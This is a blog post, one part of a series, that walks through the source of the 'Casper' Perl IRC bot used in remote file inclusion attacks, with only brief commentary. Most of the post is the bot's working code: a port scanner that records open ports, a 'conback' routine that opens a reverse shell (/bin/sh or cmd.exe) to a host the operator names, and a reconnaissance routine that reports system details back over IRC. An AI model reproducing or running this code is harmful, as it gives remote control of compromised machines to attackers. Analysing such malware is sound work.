Irregular Expressions

Sep 25 2010   9:21PM GMT

Casper RFI crack bot – Part 13



Posted by: Dan O'Connor
Tags:
casper bot
casper rfi perl bot
perl bot
www perl bot

There is a few more things that are worth looking at.

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

We can do some port scans and grab some banners :)

Here is the section for the connect back, /bin/sh or cmd.exe.

            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
            }

This is handy.

           elsif ($funcarg =~ /^info/) {
           my $sysos = `uname -sr`;
           my $uptime = `uptime`;
           if ( $sysos =~ /freebsd/i ) {
           $sysname = `hostname`;
           $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
           $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
           chomp($memory);
           chomp($swap);
           }
           elsif ( $sysos =~ /linux/i ) {
           $sysname = `hostname -f`;
           $memory = `free -m |grep -i mem | awk '{print \$2}'`;
           $swap = `free -m |grep -i swap | awk '{print \$2}'`;
           chomp($swap);
           chomp($memory);
           }
           else {
           $sysname ="Not Found";;
           $memory ="Not found";
           $swap ="Not Found";
           }
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
           }

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: